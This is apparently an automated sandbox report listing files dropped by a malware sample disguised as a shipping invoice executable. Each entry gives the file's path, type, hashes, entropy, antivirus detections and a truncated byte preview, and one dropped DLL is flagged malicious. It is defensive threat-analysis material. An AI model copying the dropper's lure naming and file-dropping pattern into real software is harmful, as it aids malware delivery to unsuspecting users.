                                                                                                                                  SHA-256:0F98148F02B339F99B13587FD33F9796CC2E8DA76FFBB4EB27AF6C3D2CBAC945
                                                                                                                                  SHA-512:AA62BA3EB0BDD2F9DB3FD74000C5D709131DFD48928A93FDF570790F6123C39D3E50BCAAEB2C3C472B5471A241D6ACE93E8DE19CE3D8CAB7EAE1B9C3932D9E9D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview: .<?xml version="1.0" encoding="utf-8"?>..<?xml-stylesheet type='text/xsl' href='entity.xsl'?>..<Entity xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <id>a8e2826b-b430-4c13-8765-d2b009e48f99</id>.. <name>CompetitorSalesLiterature</name>.. <physicalname>CompetitorSalesLiterature</physicalname>.. <logicalname>competitorsalesliterature</logicalname>.. <intersect>true</intersect>.. <security>false</security>.. <lookup>false</lookup>.. <assignment>false</assignment>.. <integrationeventmask>0</integrationeventmask>.. <workfloweventmask>0</workfloweventmask>.. <islogical>false</islogical>.. <Column>.. <id>41607dc6-fea4-4e40-9f7d-f0c2c71d79ee</id>.. <column>1</column>.. <in-code-name>competitorid</in-code-name>.. <logicalname>competitorid</logicalname>.. <physicalname>CompetitorId</physicalname>.. <length-bytes>16</length-bytes>.. <length-chars />.. <nullable>no</nullable>.. <is-pk-column>yes</is-pk
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\flac.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2706
                                                                                                                                  Entropy (8bit):5.179516218922872
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cFfH8vKYndVmmXlTkeH9vI5CduyrmmVp2i45dMg8FaTqye+B0Soqks4cyyRgLRdn:/KYn3mmXl4o1wCduyrmmVp2i4LMg8Fac
                                                                                                                                  MD5:DABA225688B554152EB810A36D5AAA0B
                                                                                                                                  SHA1:B21070F810E2F18F198BB08409CA14EFC9EAEF5C
                                                                                                                                  SHA-256:1806FD102100C6F3748942670CAAB86C19F7564CD69BB96A1FC0B29929230CCF
                                                                                                                                  SHA-512:E3B7834082281B31F9C15E8A2B580AD1ABAC9718C9866454135B8D1A83E62916FF17D5B9FB1CADF2AE80BF6C4DF9F1DDD98D0037A9A923DCBB2D56FB86D6A3BB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="audio/flac">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>FLAC audio</comment>. <comment xml:lang="ar">FLAC ....</comment>. <comment xml:lang="be@latin">A.dyjo FLAC</comment>. <comment xml:lang="bg">..... . FLAC</comment>. <comment xml:lang="ca">.udio FLAC</comment>. <comment xml:lang="cs">zvuk FLAC</comment>. <comment xml:lang="da">FLAC-lyd</comment>. <comment xml:lang="de">FLAC-Audio</comment>. <comment xml:lang="el">.... FLAC</comment>. <comment xml:lang="en_GB">FLAC audio</comment>. <comment xml:lang="eo">FLAC-sondosiero</comment>. <comment xml:lang="es">sonido FLAC</comment>. <comment xml:lang="eu">FLAC audioa</comment>. <comment xml:lang="fi">FLAC-..ni</comment>. <comment xml:lang="fo">FLAC lj..ur</comment>. <comment xml:lang="fr">audio FLAC</comment>. <comment xml:lang="ga">fuaim FLAC</commen
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):39104
                                                                                                                                  Entropy (8bit):6.237597979894025
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:QRi/Yplgp4V5qWNqYoMfTF/K4itMpdRJDh9ODV0L3d/o+X:AKYLHV5ZNbnFy4itMpdD7ODV0R/oK
                                                                                                                                  MD5:58C655527B57D74AE3C189A60A42DA18
                                                                                                                                  SHA1:F267630311A1C42CE9C4F0DEDA00E4132E9F8B25
                                                                                                                                  SHA-256:A2F590DEA50CDE47B0325D7A9ADEEA464257F46B76C059CF3E1AB2DB65574685
                                                                                                                                  SHA-512:03C708A23339792802F506278891005E521B7188D0558FCC0F25DFD0C7CB0048C8FBF1F9FB1AC65FD6EF4BC4C7CAC1715BCD8F07DD82E3E6770E327CC630E209
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: 4IZjnTicql.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: vthr97FHLT.rtf, Detection: malicious, Browse
                                                                                                                                  • Filename: mses.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Wire slip.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: uiWs90xemq.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: mMpUmTDiLo.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: SO12145970.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: order.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Ca5l6Ndopx.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Dhl package - pdf.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: BOQ Specification.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Drawings For MOPA.exe, Detection: malicious, Browse
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8...|..|..|......}..[...y..[...i..[...x....}....w..|......[...v..[...}..[...}..Rich|..........................PE..L...".3C.................4...F......D8.......P....@..........................................................................n.......................~...............T...............................h..@............P...............................text...:3.......4.................. ..`.rdata...)...P...*...8..............@..@.data................b..............@....rsrc................d..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\thermal-cpu-cdev-order.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:exported SGML document, ASCII text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):508
                                                                                                                                  Entropy (8bit):4.640723757143228
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:pvPN+VnvbZdr5vZb1bBZb8bZbTZbqMB1C:tsb/r5vZb1FZbYZbTZbqMB1C
                                                                                                                                  MD5:6BBB6D648BA2C70B9635E843818BEEBB
                                                                                                                                  SHA1:21BF5A1ACF381285EF3FE88D180B3F17D474804C
                                                                                                                                  SHA-256:9E4A02255ACD8A4C10373B6E64454A95E57986C32245A6EDA7B8CF7F57E3D740
                                                                                                                                  SHA-512:000324D55AC800870CC761C260A3DEE1EB4FA363426AE1C525FE72503502D4AA9F51104CFAB657C6F55D137BD3F1DDC5A1A4ACBA8F022468C0C1721AEFCB1A79
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: . .Specifies the order of compensation to cool CPU only..There is a default already implemented in the code, but.this file can be used to change order..The Following cooling device can present.-->..<CoolingDeviceOrder>.. Specify Cooling device order -->..<CoolingDevice>rapl_controller</CoolingDevice>..<CoolingDevice>intel_pstate</CoolingDevice>..<CoolingDevice>intel_powerclamp</CoolingDevice>..<CoolingDevice>cpufreq</CoolingDevice>..<CoolingDevice>Processor</CoolingDevice>.</CoolingDeviceOrder>..
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\vnd.ms-excel.sheet.macroenabled.12.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):7697
                                                                                                                                  Entropy (8bit):5.515382730457339
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:xAYS+gpcZWaIarmt/Omdwgm+Wz+BKUpva8i+NfY+g+uP+p+1dS59F0+9mo0my+Cn:9XxBi0Wxko7OXe8j57T2pgIcB
                                                                                                                                  MD5:5A6CAD444DBF130B22F855A889DBE677
                                                                                                                                  SHA1:8F91D234CBE3AFC1F1993BE8C63A68F756FDFC83
                                                                                                                                  SHA-256:A76702F606092D47669779F8D48F2F701319437223D87EAD41D2FA068522FF87
                                                                                                                                  SHA-512:3D777032EF8CE336E233F43A6FBDC08CFC305FE22A91433A580922A035FD71C819B423D314A888F8875FCCD0E89B3869553A38A9B20A6D078B4BDCF398818E85
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="application/vnd.ms-excel.sheet.macroEnabled.12">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment xml:lang="be@latin">Ra.likovy akru. Excel</comment>. <comment xml:lang="en_GB">Excel spreadsheet</comment>. <comment xml:lang="fo">Excel rokniark</comment>. <comment xml:lang="ia">Folio de calculo Excel</comment>. <comment xml:lang="pt_BR">Planilha do Excel</comment>. <comment xml:lang="sq">Flet. llogaritje Excel</comment>. <comment xml:lang="zh_CN">Excel ....</comment>. <comment xml:lang="zh_TW">Excel ...</comment>. <generic-icon name="x-office-spreadsheet"/>. <glob pattern="*.xlsm"/>. <sub-class-of type="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"/>. <comment>Microsoft Excel Worksheet</comment>. <comment xml:lang="af">Microsoft Excel-werkvel</comment>. <comment xml:lang="am">Microsoft Exce
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\x-texinfo.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3100
                                                                                                                                  Entropy (8bit):5.010092205102224
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:nMxJAtLuI0UYJmMcaRb2kV2JjUWBULitlqp8cwngpzQNzxkK3eTHg3GXGSIDMH79:nD0bqFi2I5
                                                                                                                                  MD5:61FFA6F5926C7F2CF819C2A0774D3E21
                                                                                                                                  SHA1:BEC77DA7C7492860DA713F8B87279CB1A3DDCB11
                                                                                                                                  SHA-256:07A5F4DFB449940A7BEA1F100120AE284067F24961457FF5F56C16F556BE4856
                                                                                                                                  SHA-512:3556CAC3A1713FF61D297F9837841DE8DB31CD90AAB848AA2BAE6BF8B1F6BFA4D42AD10324C9BAEA65BE7F08359267952B37B531C8823E4EF859202AD5AB45EB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="text/x-texinfo">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>TeXInfo document</comment>. <comment xml:lang="ar">..... TeXInfo</comment>. <comment xml:lang="ast">Documentu TeXInfo</comment>. <comment xml:lang="az">TeXInfo s.n.di</comment>. <comment xml:lang="be@latin">Dakument TeXInfo</comment>. <comment xml:lang="bg">........ . TeXInfo</comment>. <comment xml:lang="ca">document TeXInfo</comment>. <comment xml:lang="cs">dokument TeXInfo</comment>. <comment xml:lang="cy">Dogfen TeXInfo</comment>. <comment xml:lang="da">TeXInfo-dokument</comment>. <comment xml:lang="de">TeXInfo-Dokument</comment>. <comment xml:lang="el">....... TeXInfo</comment>. <comment xml:lang="en_GB">TeXInfo document</comment>. <comment xml:lang="eo">TeXInfo-dokumento</comment>. <comment xml:lang="es">documento de TeXInfo</comme
                                                                                                                                  C:\Users\user\AppData\Local\Temp\Erodium
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):238433
                                                                                                                                  Entropy (8bit):7.998471610150145
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:6144:BQfR8c9EBhNjuw4YNm8vH128zEoE/qG/ydG5h3aYvDUImzle+wX3:BQxUSw4YNXdJvE/qwakLvDupEH
                                                                                                                                  MD5:980A6B092855D202363B6436E4A854E8
                                                                                                                                  SHA1:AA8E1A7E1AB7832C3112E5C35B7DA143FF919CE0
                                                                                                                                  SHA-256:F617D029F947EBB5C0B7B159233E699F5653A1F92E81F9FE44C60555884DC93C
                                                                                                                                  SHA-512:6DEDF42A718DBC5A4AD25C20561C3ADC0FC629D1135AA68D02FC264363617C827FE7EAA0DD49E828DF93D80852B4E5AA8C932B20D43FF833C02C4B868DF30367
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ..`z....6.<.~......1.n...3`.i{W$sN.B.N.(D.t..9Yj..\u.d'..nM.............&..9N...hu.T..nC.......U....i.p..P..0...~zY...C.....SR@...~.].......{N.t...X...].L.Pw..^Q.}......>......+...'..(.Ct.....,..W.....=...p...-...nJ....3...*..=.....p....^...6....y+|..?...J........|g.Rc.(....d...1...{y6C..}P.>./....M.s.>/...........M.%9.?...D...G.;.$.4[...\."... .= ...6.i.%...d.y.D.'...L....'...[).Z..T...<.d$.....`.rS#.@.1.G&...O|.*E..=......g...)...>|.z.B...t....]......,.......B./.....!._..0].......&.....5.....}Y.K.;J...........3..L.....'/.L.6.....6..1..qM...;]..1Y.3t.a...wvI.K....]5..Q...,...]..TU.$VCC..W.]....,>........B~k.Q.b..{.XBu..~cy|s...#N......s.{.....+...8d.U.......CD....W..DL...`%L..t.,.VG........K.....PS[.!...?.....X....~p.2+..o...|MR.wd.....HLd".c...;..B.X.o..d.S..Z.w..w....+.........Km.H..%.f..vT`.{.....+..:....l(.0..V|..E.......(..cN.......mLI9#@n....Z./.7..c........?z+.........`,...aR}..N.........|..r......4.,......zU.d.|..
                                                                                                                                  C:\Users\user\AppData\Local\Temp\Prehnite.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):73728
                                                                                                                                  Entropy (8bit):5.318897902733705
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:TXpmIFZK536QZVz2LHG/jgVUTTkSTC+OWsGMN8ZoVVtAb1zcGtIrdCR:T5nc3hVz26rJNC+OWsGtMtAZzcGtIp0
                                                                                                                                  MD5:F8AA685A3908110E79F4639AA7DADDFA
                                                                                                                                  SHA1:DD4D16172EA4851F757ABD34A8CB3C835552E6A3
                                                                                                                                  SHA-256:AEEA4B86EA607CF9820E3CADD4E98353A57EC789EC0A0E2FEFBDD84ABD25194A
                                                                                                                                  SHA-512:8989A1E5A29043A8CEC9353D8923DC7FCA52988949637133D5AF5F655B04C8016EF8930DA4F57A9C068B8E9208C4B8AE2BDACA9CA699755D139CAB0ED2A3C5A6
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R..{<..{<..{<...A..{<...Q.{<..ta..{<..{=.{<...R..{<...F..{<...D..{<.Rich.{<.................PE..L...D.._...........!.................1....................................... ......................................................................................................................(...@...............\............................text............................... ..`.rdata........... ..................@..@.data....<.......@..................@....reloc..b........ ..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):39936
                                                                                                                                  Entropy (8bit):5.640913891016309
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:fqKIjHhW0CfW0FKT7vZKP1xG69D1/gEehcaLnTJ/2acSd:3RnfW0eoPPXpCnTJ/2acSd
                                                                                                                                  MD5:ED1C00557CDE869CAA963BBF9C820F05
                                                                                                                                  SHA1:53BBD8B86FCBEE9316E02AF399634522B12539B0
                                                                                                                                  SHA-256:4D50CE341BE70511E9A871DD347B3F5793EA97787CDFC92045C0BCC8AAE6E298
                                                                                                                                  SHA-512:509AFC51B647A6904A3A4ABF04B43DFAEE5FA0878C3A822FCE84DD58CE2AB1C15A38610487C520CA6F7C42ED37D754DF55A82B0A81A28D31493F2535D9568405
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K4T.*Z..*Z..*Z.'"U..*Z.'"...*Z..*[.}*Z.*"...*Z.*":..*Z.'"...*Z.'"...*Z.Rich.*Z.................PE..L...F..>.................`...F......aU.......p................................................... ..........................`c...........6..............................................................@............................................text...F^.......`.................. ..`.data........p.......d..............@....rsrc....6.......6...f..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\font\init\msg\x-navi-animation.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3225
                                                                                                                                  Entropy (8bit):5.314169702825883
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:1H5/nf2jK/PMQ5B15rPYs7xV01oAZXw5BQDs4XJxjvF1w0ng0nnmDkrZeClbrIMH:ffIil2FI0
                                                                                                                                  MD5:9565C08D6037EEA308B97581F12BE260
                                                                                                                                  SHA1:1954B1CFBF437BD79FDD597C15C25BB01B83F243
                                                                                                                                  SHA-256:1199A3E8F3C8C23C59FEB468A1D1542BA6ABE3C373589DF0277924EAFDB50D57
                                                                                                                                  SHA-512:247762DF5C903AC0F478831A88FB4E0FE3EDF5404FE3D263A443BC035D9741317DF8CDA8284A6409C3D7DB8E89742520E9DCAC4F9E0BB38ED18E24C791D6CA0D
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="application/x-navi-animation">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>Windows animated cursor</comment>. <comment xml:lang="ar">.... ...... .......</comment>. <comment xml:lang="be@latin">Animavany kursor Windows</comment>. <comment xml:lang="bg">...... . Windows, ........</comment>. <comment xml:lang="ca">cursor animat de Windows</comment>. <comment xml:lang="cs">animovan. kurzor Windows</comment>. <comment xml:lang="da">Windowsanimeret mark.r</comment>. <comment xml:lang="de">Animierter Windows-Cursor</comment>. <comment xml:lang="el">.......... ....... Windows</comment>. <comment xml:lang="en_GB">Windows animated cursor</comment>. <comment xml:lang="es">cursor animado de Windows</comment>. <comment xml:lang="eu">Windows-eko kurtsore animatua</comment>. <comment xm
                                                                                                                                  C:\Users\user\AppData\Local\Temp\font\init\msg\x-pn-audibleaudio.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):392
                                                                                                                                  Entropy (8bit):4.965076682722952
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:TMHd97KLSjTqy3F4N5542UHZ2DKX2IRKCJSHUBmAyJSHUBmA4AsF:2d97/joqZHZ2i2kKCLBmrLBmpjF
                                                                                                                                  MD5:AD1C969082DE8AA77B382516F5B0FF61
                                                                                                                                  SHA1:A83DC30341A5752A9D0D18770EF257C8C0B3A692
                                                                                                                                  SHA-256:78930E0C87BC468FC5B13A5F971C244D9158C9DE7B1F2C219213E5CA18E60F03
                                                                                                                                  SHA-512:559B71307FF0159089FA194B1C0359B446C23A78F3B44D969BA44B759ACA409BFF0B63F7FF5CA7BDA840583F9C29E13527B36DA45CBEAB6189D15BA9037F473B
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="audio/x-pn-audibleaudio">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>Audible.Com audio</comment>. <glob pattern="*.aa"/>. <glob pattern="*.aax"/>. <alias type="audio/vnd.audible"/>. <alias type="audio/vnd.audible.aax"/>.</mime-type>.
                                                                                                                                  C:\Users\user\AppData\Local\Temp\manage\mms\VCProjectEngine.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1078
                                                                                                                                  Entropy (8bit):5.254976539067803
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:2djEk62f7mmhKslkmog89hEmYnLuZ1nLw3LHEaFXu0:cjP7mmh3amorEmYnLinLw3LHEaFXL
                                                                                                                                  MD5:3E2460DF0763A75406D2C92A6CAC864C
                                                                                                                                  SHA1:3CC0933DF52BD4B09767ADA563B58923EF68EBAF
                                                                                                                                  SHA-256:301A735BCB6DE1DE09D0B9098228A419954404D8AA575F40AD82FC3A84403E35
                                                                                                                                  SHA-512:5B80AEBC3BEC840CE2ED024E1D6551F67E6DC7F611FDE1F054F7A4053AECDE72460517C5203672694E98DBE9F9C97CFEE2CF9A5FB39DCDCB17862051039D3FEA
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<VCPlatformConfigurationFile ...Version="8.00"...>.. <Platform ....Name="VCProjectEngine.dll" ....Identifier="Win32"....>....<Directories .....Include="$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(VCInstallDir)PlatformSDK\include;$(FrameworkSDKDir)include".....Library="$(VCInstallDir)lib;$(VCInstallDir)atlmfc\lib;$(VCInstallDir)atlmfc\lib\i386;$(VCInstallDir)PlatformSDK\lib;$(FrameworkSDKDir)lib;$(VSInstallDir);$(VSInstallDir)lib".....Path="$(VCInstallDir)bin;$(VCInstallDir)PlatformSDK\bin;$(VSInstallDir)Common7\Tools\bin;$(VSInstallDir)Common7\tools;$(VSInstallDir)Common7\ide;$(ProgramFiles)\HTML Help Workshop;$(FrameworkSDKDir)bin;$(FrameworkDir)$(FrameworkVersion);$(VSInstallDir);$(VSInstallDir)\SDK\v2.0\bin;$(SystemRoot)\SysWow64;$(FxCopDir);$(PATH)".....Reference="$(FrameworkDir)$(FrameworkVersion);$(VCInstallDir)atlmfc\lib".....Source="$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\mfcm;$(VCInstallDir)atlmfc\src\atl;$(
                                                                                                                                  C:\Users\user\AppData\Local\Temp\manage\mms\WordExceptList.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3965
                                                                                                                                  Entropy (8bit):4.628651510242669
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:J9EFoF4F+FYwFkkkOzycs608uXPfzW6up8JiJHhwU9gvzu/6v1wtgETtkbvcIEeP:JpCHncA75Jz
                                                                                                                                  MD5:EF0EA2A1ECE97BE3CF9C9F1D30670E34
                                                                                                                                  SHA1:B960BCB826DA726AB2D919EEF781EE586DF4D607
                                                                                                                                  SHA-256:BA85D3915E513AF98861E7AD82A42E80D957CE52A71463E6E34609C34F3A0E1C
                                                                                                                                  SHA-512:CA23AD61BAEF5E5E96331D7DB2D645D657FB692E4641D364D94F703CDEDDE7C2FCCBBB5939DFA2B43CE07E767F51F6EF72FE1ACE58A6CA47D4DDCCD7B6799443
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <block-list:block-list xmlns:block-list="http://openoffice.org/2001/block-list"><block-list:block block-list:abbreviated-name="BCom"/><block-list:block block-list:abbreviated-name="BCom(Ed)"/><block-list:block block-list:abbreviated-name="BComHons"/><block-list:block block-list:abbreviated-name="BCom(Hons)"/><block-list:block block-list:abbreviated-name="BCompt"/><block-list:block block-list:abbreviated-name="BCur"/><block-list:block block-list:abbreviated-name="BCur(Ed et Adm)"/><block-list:block block-list:abbreviated-name="BCur(I et A)"/><block-list:block block-list:abbreviated-name="BDiac"/><block-list:block block-list:abbreviated-name="BEcon"/><block-list:block block-list:abbreviated-name="BEcon(Ed)"/><block-list:block block-list:abbreviated-name="BEconSc"/><block-list:block block-list:abbreviated-name="BEd"/><block-list:block block-list:abbreviated-name="BEdPh"/><block-list:block block-list:abbreviated-name="BHuish"/><block-list:block block-list:abbreviated-name="BIng"/><block-li
                                                                                                                                  C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):18552
                                                                                                                                  Entropy (8bit):6.326879340022009
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:1vh8+o5DhIpvK2HSlajv9J1L/gLCcY9jBJJx+:1JuQ5DgL38TJx+
                                                                                                                                  MD5:0C74A8A66DB361A91A8E46E256234B9D
                                                                                                                                  SHA1:B4EEB6CC71C68264B348824997930426DE1E6C41
                                                                                                                                  SHA-256:245BC780CA69A4B6019625BD1046D7C1C0F4720B795BA2D091AC62B9B7C73DE1
                                                                                                                                  SHA-512:CFBCA14304D8A168944381A139D0299516188C2914F78267CB75C9DB903CB1562BB48E6B540C39C3A9D436180D54B18772C0337C9711808829C20F837C5FEAC9
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................O.....O.....O.....A............O.....O.....O.....O.....Rich............................PE..L......B...........!.........................0.....a.........................p..................................... <..}....7..<....P...............2..x....`..t....0...............................6..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (Windows CE) ARM, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2560
                                                                                                                                  Entropy (8bit):2.8091845512006928
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:6gclPCaIZWy+cAcMphg2R5WPWghhrSZP3CE3h:l+EWAAcwCgWPVhrSh3CEx
                                                                                                                                  MD5:BC977F27DB75D9E99EF4733F6603AD0C
                                                                                                                                  SHA1:799BAF9192BDE18BF0B260840FFE5ADA27CD13A3
                                                                                                                                  SHA-256:BEC1776C798A4DCED9C153A9739FADAAC1D80AF11FB652275A6038396C960CA6
                                                                                                                                  SHA-512:748AC90A592760BA02247A4C31786D5BB65414E1465A2EE81B3D658A856CCA94C07EC89F3A24DBEF3208258ED7F6F0DB990126EA6BBE8654D1A87C97D494BE07
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........................PE......3.3C...........!......................................................... .......................................................................................................................................................................rsrc...............................@..@.................................................... .......8...................?...P.......................h...................................................,.................................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................*.'.....*.'.?.................................S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.4.0.9.0.4.B.0...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...l."...F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....V.S.D. .e.m.b.e.d.d.e.d. .j.i.t. .d.e.b.u.g.g.e.r. .S.t.r.i.
                                                                                                                                  C:\Users\user\AppData\Local\Temp\nse53A7.tmp
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):657776
                                                                                                                                  Entropy (8bit):6.748405173068804
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:sGgbmgcb04MKJuQxUSw4YNXdJvE/qwakLvDupEScr2d0:TlgcxrJuQ/TCtAqbpHc6d0
                                                                                                                                  MD5:393215B51E4C54A6950B13796ABEA20F
                                                                                                                                  SHA1:77225F7A62F29560C7087176E187ED2012E0A25E
                                                                                                                                  SHA-256:DA2F2572CCA884673B95FF9DD3C8BDF4598240F45F5206F110DF99EC6289EECA
                                                                                                                                  SHA-512:C48A8C603B18790E83A19BAAFA7B5C1443C48163AA84D0CDCD3142F48C84DF971C0EAC8DA6B28F724B167C06E3B439E87A8DD116032701975CB691BF140CE96F
                                                                                                                                  Malicious:false
